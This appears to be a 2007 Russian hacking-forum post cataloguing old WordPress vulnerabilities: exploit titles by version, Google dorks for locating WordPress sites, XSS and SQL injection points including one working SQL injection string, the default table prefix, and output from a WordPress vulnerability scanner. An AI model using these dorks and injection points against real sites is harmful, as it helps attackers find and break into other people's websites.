Форум АНТИЧАТ - [ Обзор уязвимостей WordPress ]

[ Обзор уязвимостей WordPress ]

05.10.2007, 19:34

ettee

Administrator

Регистрация: 12.10.2006

Сообщений: 466

Провел на форуме:
17234747

Репутация: 5170

[ Обзор уязвимостей WordPress ]

Vulnerabilities:

Wordpress Multiple Versions Pwnpress Exploitation Tookit (0.2pub)

Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability

Enigma 2 WordPress Bridge (boarddir) Remote File Include Vulnerability

1.4*
Wordpress plugin wordTube <= 1.43 (wpPATH) RFI Vulnerability

Wordpress plugin wp-Table <= 1.43 (inc_dir) RFI Vulnerability

Wordpress Plugin myGallery <= 1.4b4 Remote File Inclusion Vulnerability

1.5.1.*
Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit)

Wordpress <= 1.5.1.3 Remote Code Execution 0-Day Exploit

Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit

WordPress <= 1.5.1.1 SQL Injection Exploit

WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit

2.0.*
WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit

Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit

Wordpress 2.0.5 Trackback UTF-7 Remote SQL Injection Exploit

2.1.*
Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit

Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit

2.*
Wordpress <= 2.x dictionnary & Bruteforce attack

WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit

Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit

dork:

Код:

"is proudly powered by WordPress"
intext:"Warning: main" inurl:Wp ext:php
inurl:wp-login.php Register Username Password -echo -trac
inurl:"wp-admin" config -cvs -phpxref
inurl:/comments/feed/rss2/ intext:wordpress.org?v=*
Powered by Wordpress 1.2
intext:"proudly powered by WordPress" filetype:php
intext:"powered by WordPress" filetype:php -dritte-seite
intitle:"WordPress > * > Login form" inurl:"wp-login.php" 
ext:php inurl:"wp-login.php" -cvs

Full path disclosure:

WordPress < 1.5.2

Cross-site Scripting:
/wp-login.php?action=login&redirect_to=[XSS]
/wp-admin/templates.php?file=[XSS]
/wp-admin/post.php?content=[XSS]
http://www.example.com/wp-admin/edit-comments.php?s=[XSS]
http://www.example.com/wp-admin/edit-comments.php?s=bla&submit=Search&mode=[XSS]
http://www.example.com/wp-admin/templates.php?file=[XSS]
http://www.example.com/wp-admin/link-add.php?linkurl=[XSS]
http://www.example.com/wp-admin/link-add.php?name=[XSS]
http://www.example.com/wp-admin/link-categories.php?cat_id=[XSS]&action=Edit
http://www.example.com/wp-admin/link-manager.php?order_by=[XSS]
http://www.example.com/wp-admin/link-manager.php?cat_id=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_url=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_name=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_description=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rel=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_image=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rss_uri=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_notes=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_id=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&order_by=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&cat_id=[XSS]
http://www.example.com/wp-admin/post.php?content=[XSS]
http://www.example.com/wp-admin/moderation.php?action=update&item_approved=[XSS]

SQL injection examples:
http://www.example.com/index.php?m=[SQL]
http://www.example.com/wp-admin/edit.php?m=[SQL]
http://www.example.com/wp-admin/link-categories.php?cat_id=[SQL]&action=Edit
http://www.example.com/index.php?cat=100)%09or%090=0%09or%09(0=1

Tables/Prefix_/Columns:
wp_

Hash algorithms:
md5(password)

WordPress Vulnerability Scanner

Код:

$ perl -x wp-scanner.pl http://testblog/wordpress/

WordPress Scanner starting: David Kierznowski (http://michaeldaw.org)

Using plugins dir: wp-content/plugins
[*] Initial WordPress Enumeration[*] Finding WordPress Major Version[*] Testing WordPress Template for XSS

WordPress Basic Results

        wp-commentsrss2.php =>  Version Leak: WordPress 2.1.3
        wp-links-opml.php =>    Version Leak: WordPress 2.1.3
        wp-major-ver => Version 2.1
        wp-rdf.php =>   Version Leak: WordPress 2.1.3
        wp-rss.php =>   Version Leak: WordPress 2.1.3
        wp-rss2.php =>  Version Leak: WordPress 2.1.3
        wp-server =>    Apache/1.3.34 (Unix) PHP/4.4.4 mod_ssl/2.8.25 OpenSSL/0.9.8a
        wp-style-dir => http://testblog/wordpress/wp-content/themes/time1-theme-10/style.css
        wp-title => Test Blog
        wp-version =>   WordPress 2.1.3
        x-Pingback =>   http://testblog/wordpress/xmlrpc.php

WordPress Plugins Found

        wp-plugins[0]    => Akismet

Download

Последний раз редактировалось ettee; 10.12.2007 в 23:38..